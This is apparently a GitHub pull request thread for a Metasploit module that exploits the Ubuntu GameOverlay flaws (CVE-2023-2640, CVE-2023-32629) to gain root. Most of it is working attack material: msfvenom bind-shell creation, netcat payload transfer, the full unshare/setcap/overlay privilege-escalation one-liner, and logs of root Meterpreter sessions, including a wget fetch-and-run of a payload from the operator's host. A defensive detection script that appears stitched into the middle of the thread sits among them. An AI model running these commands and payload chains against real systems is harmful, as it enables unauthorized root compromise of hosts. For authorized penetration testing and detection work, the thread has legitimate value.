
CVE-2023-2640, CVE-2023-32629 Game Overlay Ubuntu Privilege Escalation #19460

Open. Wants to merge 68 commits into base: master.

Conversation

gardnerapp (Contributor)

This module was originally suggested by #18765 and builds on this PoC from @g1vi. CVE-2023-2640 and CVE-2023-32629 allow for privilege escalation on Ubuntu systems due to a failure to call vfs_setxattr during execution of ovl_do_setxattr; this results in the failure to sanitize file capabilities during the file system union process. This article explains the technical details of the vulnerability much better than I can and also provides a convenient list of vulnerable Ubuntu and kernel versions.

This exploit was tested on Ubuntu Focal Fossa 20.04.6 with a 5.4.0-1018-aws kernel. I changed the kernel version by following this tutorial; the Google Drive doc linked in the video is probably quicker to read. Please note that I used a bind shell to connect to the system, and a bind shell as a payload for the exploit. I am well aware that bind shells are frowned upon IRL because of firewalls, IDS, etc. I only had to use one because I don't have access to a Linux system outside of the cloud.

Verification

  1. Target System

ubuntu@ubuntu ~$ cat /etc/os-release && uname -a
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Linux 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
  2. Creating a bind shell
    msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=5555 -f elf -o bind.elf

  3. Transfer the bind shell
    I used netcat
    On remote machine: nc -lvnp 1234 > bind.elf
    On local machine: nc <REMOTE IPADDRESS> 1234 < bind.elf

  4. Execute the bind shell
    chmod +x bind.elf && ./bind.elf

  5. Start msf and connect to bind shell

$ msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meteroreter/bind_tcp
[-] The value specified for payload is not valid.
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:5555
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 1 opened (172.16.227.214:52193 -> 54.158.170.60:5555) at 2024-09-13 09:48:31 -0400

meterpreter > shell
Process 9129 created.
Channel 1 created.
whoami
ubuntu
exit
meterpreter > bg
[*] Backgrounding session 1...
  6. Running the exploit. I unfortunately also had to use a bind shell for this.
msf6 exploit(multi/handler) > use exploit/linux/local/game_overlay_privesc 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set session 1 
session => 1
msf6 exploit(linux/local/game_overlay_privesc) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set lport 6666
lport => 6666
msf6 exploit(linux/local/game_overlay_privesc) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Focal Fossa
[*] Detected kernel version: 5.4.0-1018-aws
[+] The target is vulnerable. Focal Fossa with 5.4.0-1018-aws kernel is vunerable
[*] Creating directory /tmp/main/l
[*] Creating directory /tmp/main/u
[*] Creating directory /tmp/main/w
[*] Creating directory /tmp/main/m
[*] Creating directory to store payload: /tmp/main/
[*] Writing payload: /tmp/main/marv
[*] Starting new namespace, and running exploit...
[*] Running exploit: 'unshare -rm sh -c "cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*" && /tmp/main/u/python3 -c 'import os;os.setuid(0); os.system("chmod +x /tmp/main/marv && /tmp/main/marv")' ' 

false
[*] Command Stager progress - 100.00% done (747/747 bytes)
[*] Started bind TCP handler against :6666
[*] Exploit completed, but no session was created.

There is now a bind shell running on the system with root level privileges. On the remote system you can verify the listening port with ss -ano | grep 6666

  7. Connect to the root bind shell
msf6 exploit(linux/local/game_overlay_privesc) > use exploit/multi/handler
[*] Using configured payload linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:6666
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 2 opened (172.16.227.214:52242 -> 54.158.170.60:6666) at 2024-09-13 09:53:31 -0400

meterpreter > shell
Process 9532 created.
Channel 1 created.
whoami
root

Here are some pictures

Open bind port on target (screenshot: bind_shell)

Process list after payload execution; marv is meterpreter running as root (screenshot: processes)

Exploit (two screenshots, 2024-09-13 at 9:54:15 AM and 9:53:49 AM)
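Added example, not code from this PR or from Metasploit: a Python host check that parses per-process mount tables and getcap output for the two host-side traces the run log above leaves behind, an overlay mount whose lowerdir, upperdir and workdir all sit under /tmp, and a copied python3 carrying cap_setuid in the upperdir. The sample mount and getcap lines are constructed (modelled on the module output), and the user-writable roots and trusted prefixes are assumptions to tune per host. Because the mount is made inside the namespace created by unshare -rm, it is only visible in that process's /proc/<pid>/mounts, never in the host's /proc/mounts; the capability-bearing copy, by contrast, persists on disk unless the module cleans it up.

```python
"""Defender-side checks for the pattern this PR automates: an unprivileged user
copies a binary under /tmp, gives it a file capability, mounts an overlayfs whose
layers all live under /tmp, and ends up with a cap_setuid binary in the upperdir.
Inputs are constructed samples, not data from a real host."""
from __future__ import annotations

import re

# Roots an unprivileged local user can normally write to (assumption; tune per host).
USER_WRITABLE_ROOTS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/run/user/")
# Prefixes where capability-bearing files are installed by packages (assumption).
TRUSTED_CAP_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/bin/", "/sbin/")
LAYER_KEYS = ("lowerdir", "upperdir", "workdir")

# Constructed /proc/<pid>/mounts sample: '<source> <target> <fstype> <options> <dump> <pass>'.
# Line 1 mirrors the mount the module issues; line 2 is a benign container overlay.
SAMPLE_PID_MOUNTS = """\
overlay /tmp/main/m overlay rw,relatime,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w 0 0
overlay /var/lib/docker/overlay2/3f2a/merged overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAAA:/var/lib/docker/overlay2/l/BBBB,upperdir=/var/lib/docker/overlay2/3f2a/diff,workdir=/var/lib/docker/overlay2/3f2a/work 0 0
/dev/xvda1 / ext4 rw,relatime,discard 0 0
"""

# Constructed `getcap -r /` sample mixing both libcap output styles:
# '/path cap=flags' (libcap >= 2.41) and '/path = cap+flags' (older releases).
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/tmp/main/u/python3 cap_setuid=eip
"""


def _unescape(s: str) -> str:
    """Decode the \\040-style octal escapes the kernel uses for spaces in mount paths."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), s)


def parse_mounts(text: str) -> list[dict]:
    """Parse /proc/mounts-format lines; options become a dict (bare flags map to True)."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # blank or truncated line
        opts = {}
        for opt in parts[3].split(","):
            key, _, val = opt.partition("=")
            opts[key] = _unescape(val) if val else True
        mounts.append({"source": _unescape(parts[0]), "target": _unescape(parts[1]),
                       "fstype": parts[2], "options": opts})
    return mounts


def under_user_writable(path: str) -> bool:
    return any(path == root.rstrip("/") or path.startswith(root) for root in USER_WRITABLE_ROOTS)


def suspicious_overlay_mounts(mounts_text: str) -> list[dict]:
    """Overlay mounts with at least one layer under a user-writable root.
    Container runtimes keep their layers under /var/lib/..., so they are not flagged."""
    findings = []
    for m in parse_mounts(mounts_text):
        if m["fstype"] != "overlay":
            continue
        layers = []
        for key in LAYER_KEYS:
            val = m["options"].get(key)
            if isinstance(val, str):
                layers.extend(val.split(":"))  # lowerdir may stack several layers
        bad = [p for p in layers if under_user_writable(p)]
        if bad:
            findings.append({"target": m["target"], "writable_layers": bad})
    return findings


_GETCAP_RE = re.compile(r"^(?P<path>\S+)(?: =)? (?P<caps>.+)$")


def parse_getcap(text: str) -> list[tuple[str, list[str]]]:
    """Parse getcap output into (path, [capability names]), accepting both libcap styles."""
    results = []
    for line in text.splitlines():
        m = _GETCAP_RE.match(line.strip())
        if not m:
            continue
        names = []
        for clause in m.group("caps").split():  # e.g. 'cap_a,cap_b=ep cap_c+i'
            names.extend(c for c in re.split(r"[=+-]", clause)[0].split(",") if c)
        results.append((m.group("path"), names))
    return results


def suspicious_caps(getcap_text: str) -> list[dict]:
    """Flag cap_setuid anywhere, and any file capability outside the trusted prefixes."""
    findings = []
    for path, names in parse_getcap(getcap_text):
        reasons = []
        if "cap_setuid" in names:
            reasons.append("cap_setuid is a direct route to uid 0")
        if not path.startswith(TRUSTED_CAP_PREFIXES):
            reasons.append("capability-bearing file outside package-managed paths")
        if reasons:
            findings.append({"path": path, "caps": names, "reasons": reasons})
    return findings


def report() -> dict:
    """Run both checks over the constructed samples and return the findings."""
    return {"overlay_mounts": suspicious_overlay_mounts(SAMPLE_PID_MOUNTS),
            "file_caps": suspicious_caps(SAMPLE_GETCAP)}


if __name__ == "__main__":
    import json
    print(json.dumps(report(), indent=2))
```

On a live host the same two functions would be fed the contents of every /proc/<pid>/mounts (the namespaced mount exists only while the unshare'd process lives) and the output of getcap -r over /tmp, /var/tmp and /dev/shm; the capability finding is the durable one and is worth a periodic scan, while the mount finding is a real-time signal.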

bwatters-r7 (Contributor) commented Sep 27, 2024

@gardnerapp I wanted to let you know I started working on this yesterday. It was super close, so I only did a couple minor changes and was able to get execution. I want to see if I can also get the ARCH_CMD payloads to work, since it is a command we're issuing and it should be straightforward 😆 . I hope I can get a PR to you with suggestions sometime today (US time).

Also, I was able to get a local VM to be vulnerable by downloading Ubuntu 22.04x64 and running:

sudo apt update
sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic
reboot

I did it immediately and then took the VM offline in case it was silently patched.

bwatters-r7 (Contributor) left a review comment

@gardnerapp This was a super neat exploit. Thank you for submitting it! It was very close to working, and I was able to get it to work with both binary and ARCH_CMD payloads with just a bit of tweaking.

I tried to leave suggested changes, but if I missed something, I put up a working version here:

https://github.com/bwatters-r7/metasploit-framework/blob/cve-2023-32629/modules/exploits/linux/local/gameoverlay_privesc.rb

Here it is using both binary and ARCH_CMD payload targets:

msf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OS Codename = (Jammy Jellyfish)
[*] Detected Ubuntu version: Jammy Jellyfish
[*] Detected kernel version: 5.19.0-41-generic
[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
[*] Creating directory /tmp/TIMMJsZ/
[*] Creating directory /tmp/TIMMJsZ/
[*] /tmp/TIMMJsZ/ created
[*] Creating directory /tmp/TIMMJsZ/JpDsTcJSHs/
[*] Creating directory /tmp/TIMMJsZ/JpDsTcJSHs/
[*] /tmp/TIMMJsZ/JpDsTcJSHs/ created
[*] Creating directory /tmp/TIMMJsZ/gvuIpvd/
[*] Creating directory /tmp/TIMMJsZ/gvuIpvd/
[*] /tmp/TIMMJsZ/gvuIpvd/ created
[*] Creating directory /tmp/TIMMJsZ/FZrdUUPoKwg/
[*] Creating directory /tmp/TIMMJsZ/FZrdUUPoKwg/
[*] /tmp/TIMMJsZ/FZrdUUPoKwg/ created
[*] Creating directory /tmp/TIMMJsZ/ZSwBHcRmY/
[*] Creating directory /tmp/TIMMJsZ/ZSwBHcRmY/
[*] /tmp/TIMMJsZ/ZSwBHcRmY/ created
[*] Writing payload: /tmp/TIMMJsZ/marv
[*] Starting new namespace, and running exploit...
[*] unshare -rm sh -c "cp /usr/bin/python3 /tmp/TIMMJsZ/JpDsTcJSHs/; setcap cap_setuid+eip /tmp/TIMMJsZ/JpDsTcJSHs/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/TIMMJsZ/JpDsTcJSHs/,upperdir=/tmp/TIMMJsZ/gvuIpvd/,workdir=/tmp/TIMMJsZ/FZrdUUPoKwg/ /tmp/TIMMJsZ/ZSwBHcRmY/ && touch /tmp/TIMMJsZ/ZSwBHcRmY/*; " && /tmp/TIMMJsZ/gvuIpvd/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod +x /var/tmp/bash && chmod +x /tmp/TIMMJsZ/marv && /var/tmp/bash -p -c /tmp/TIMMJsZ/marv &&  rm -rf /tmp/TIMMJsZ/JpDsTcJSHs/ /tmp/TIMMJsZ/ZSwBHcRmY/ /tmp/TIMMJsZ/gvuIpvd/ /tmp/TIMMJsZ/FZrdUUPoKwg/ /var/tmp/bash")'
[+] Deleted /tmp/TIMMJsZ/
[*] Meterpreter session 37 opened (10.5.135.201:4585 -> 10.5.132.129:41602) at 2024-09-27 20:21:47 -0500
[*] 

meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down session: 37

[*] 10.5.132.129 - Meterpreter session 37 closed.  Reason: User exit
msf6 exploit(linux/local/gameoverlay_privesc) > set target 1
target => 1
msf6 exploit(linux/local/gameoverlay_privesc) > set payload cmd/linux/http/x64/meterpreter_reverse_tcp 
payload => cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Command to run on remote host: wget -qO ./IWtillzOhEDS http://10.5.135.201:8080/s-Ca9BmTKo-IpFX8XiUd8w; chmod +x ./IWtillzOhEDS; ./IWtillzOhEDS &
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /s-Ca9BmTKo-IpFX8XiUd8w
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OS Codename = (Jammy Jellyfish)
[*] Detected Ubuntu version: Jammy Jellyfish
[*] Detected kernel version: 5.19.0-41-generic
[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
[*] Creating directory /tmp/qowPTdD/
[*] Creating directory /tmp/qowPTdD/
[*] /tmp/qowPTdD/ created
[*] Creating directory /tmp/qowPTdD/aRZdFGYWbp/
[*] Creating directory /tmp/qowPTdD/aRZdFGYWbp/
[*] /tmp/qowPTdD/aRZdFGYWbp/ created
[*] Creating directory /tmp/qowPTdD/krILBcsetBfz/
[*] Creating directory /tmp/qowPTdD/krILBcsetBfz/
[*] /tmp/qowPTdD/krILBcsetBfz/ created
[*] Creating directory /tmp/qowPTdD/KahdTIAH/
[*] Creating directory /tmp/qowPTdD/KahdTIAH/
[*] /tmp/qowPTdD/KahdTIAH/ created
[*] Creating directory /tmp/qowPTdD/KqwYrX/
[*] Creating directory /tmp/qowPTdD/KqwYrX/
[*] /tmp/qowPTdD/KqwYrX/ created
[*] Starting new namespace, and running exploit...
[*] unshare -rm sh -c "cp /usr/bin/python3 /tmp/qowPTdD/aRZdFGYWbp/; setcap cap_setuid+eip /tmp/qowPTdD/aRZdFGYWbp/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/qowPTdD/aRZdFGYWbp/,upperdir=/tmp/qowPTdD/krILBcsetBfz/,workdir=/tmp/qowPTdD/KahdTIAH/ /tmp/qowPTdD/KqwYrX/ && touch /tmp/qowPTdD/KqwYrX/*; " && /tmp/qowPTdD/krILBcsetBfz/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod +x /var/tmp/bash && /var/tmp/bash -p -c \"wget -qO ./IWtillzOhEDS http://10.5.135.201:8080/s-Ca9BmTKo-IpFX8XiUd8w; chmod +x ./IWtillzOhEDS; ./IWtillzOhEDS &\" rm -rf /tmp/qowPTdD/aRZdFGYWbp/ /tmp/qowPTdD/KqwYrX/ /tmp/qowPTdD/krILBcsetBfz/ /tmp/qowPTdD/KahdTIAH/ /var/tmp/bash")'
[*] Client 10.5.132.129 requested /s-Ca9BmTKo-IpFX8XiUd8w
[*] Sending payload to 10.5.132.129 (Wget/1.21.2)
[+] Deleted /tmp/qowPTdD/
[*] 
[*] Meterpreter session 38 opened (10.5.135.201:4585 -> 10.5.132.129:57044) at 2024-09-27 20:23:05 -0500

meterpreter > getuid
Server username: root

bwatters-r7 (Contributor)

@gardnerapp do you have the time to add documentation to this?
See #19460 (comment)

gardnerapp (Contributor, Author)

I will try and get the documentation done by Friday!

[
'Linux_Binary',
{
'Arch' => [ ARCH_X86, ARCH_X64 ],
Contributor

Dumb question, but why those two architectures only? The exploit seems quite portable to me.

Contributor

Absolutely. Those are the only ones we tested on. If I get a chance I'll try it out on an Ubuntu AARCH_64, which I think is the only other Ubuntu arch?

Contributor

Now that you mention it, x86 is not supported by Ubuntu anymore, so we should remove it. (screenshot)

Contributor

Happy to add anything anyone wants to test and verify. I'll do AARCH_64. 🎉

Contributor

AARCH64 does work:

[*] Meterpreter session 1 opened (10.5.135.201:4588 -> 10.5.132.149:60980) at 2024-10-02 16:27:35 -0500

msf6 payload(linux/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/aarch64/meterpreter_reverse_tcp) > use exploit/linux/local/gameoverlay_privesc 
[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp
msf6 exploit(linux/local/gameoverlay_privesc) > set session 1
session => 1
msf6 exploit(linux/local/gameoverlay_privesc) > set target 0
target => 0
msf6 exploit(linux/local/gameoverlay_privesc) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(linux/local/gameoverlay_privesc) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(linux/local/gameoverlay_privesc) > show options

Module options (exploit/linux/local/gameoverlay_privesc):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   PayloadFileName  pVmtuGOGXdO      yes       Name of payload
   SESSION          1                yes       The session to run this module on
   WritableDir      /tmp             yes       A directory where we can write files


Payload options (linux/aarch64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux_Binary



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Jammy Jellyfish
[*] Detected kernel version: 5.19.0-41-generic
[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
[*] Creating directory /tmp/UqNFkc/
[*] Creating directory /tmp/UqNFkc/QKZiqWWsnSOz/
[*] Creating directory /tmp/UqNFkc/WbrucZxIAlWZF/
[*] Creating directory /tmp/UqNFkc/uKmqunqY/
[*] Creating directory /tmp/UqNFkc/pwFUmC/
[*] Writing payload: /tmp/UqNFkc/pVmtuGOGXdO
[*] Starting new namespace, and running exploit...
[+] Deleted /tmp/UqNFkc/
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:49168) at 2024-10-02 16:28:43 -0500
[*] 

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: root
meterpreter > 

gardnerapp (Contributor, Author) commented Oct 15, 2024

For some reason the Linux Binary payload was no longer working. I added include Msf::Exploit::Exe and have a successful test for binary payloads:

use exploit/multi/handler
[*] Using configured payload linux/x64/meterpreter/bind_tcp
runmsf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.173.113.139:5555
[*] Sending stage (3045380 bytes) to 54.173.113.139
[*] Meterpreter session 7 opened (192.168.0.239:49861 -> 54.173.113.139:5555) at 2024-10-15 10:40:53 -0400

meterpreter > bg
[*] Backgrounding session 7...
msf6 exploit(multi/handler) > use exploit/linux/local/gameoverlay_privesc 
[*] Using configured payload linux/x64/meterpreter/bind_tcp
rmsf6 exploit(linux/local/gameoverlay_privesc) > run

[-] Msf::OptionValidateError The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/local/gameoverlay_privesc) > set session 7
session => 7
rumsf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Focal Fossa
[*] Detected kernel version: 5.4.0-1018-aws
[+] The target is vulnerable. Focal Fossa with 5.4.0-1018-aws kernel is vunerable
[*] Creating directory to store payload: /tmp/fQUjBSq/
[*] Creating directory /tmp/fQUjBSq/
[*] Creating directory /tmp/fQUjBSq/aBbfZQAtd/
[*] Creating directory /tmp/fQUjBSq/ipGtJZ/
[*] Creating directory /tmp/fQUjBSq/lhwOKOXG/
[*] Creating directory /tmp/fQUjBSq/RtMgBtIyVpn/
[*] Writing payload: /tmp/fQUjBSq/marv
[*] 
[*] Started bind TCP handler against 54.173.113.139:4444
[*] Sending stage (3045380 bytes) to 54.173.113.139
[+] Deleted /tmp/fQUjBSq/
[*] Meterpreter session 8 opened (192.168.0.239:49872 -> 54.173.113.139:4444) at 2024-10-15 10:41:31 -0400

meterpreter > id
[-] Unknown command: id. Run the help command for more details.
meterpreter > getuid
Server username: root

Additionally, I've added randomization to the bash copy. It appears to be running properly, but I couldn't fully test it due to hardware issues. I'm running the exploit against cloud-based systems, and cmd payloads are only supported with a dropper. If someone could test cmd targets, that would help!


bwatters-r7 (Contributor)

Hey there, @gardnerapp; I am sorry I let this fall by the wayside, and I want to get this merged and landed because it is pretty darn cool. Is there a reason you included the netcat binary in this?

bwatters-r7 (Contributor)

Also, I want to get #19528 landed so we can use it for the command execution.

gardnerapp (Contributor, Author) commented Oct 31, 2024

> Hey there, @gardnerapp; I am sorry I let this fall by the wayside, and I want to get this merged and landed because it is pretty darn cool. Is there a reason you included the netcat binary in this?

Not sure why I committed NC, pretty sure it was by accident. Just removed it.
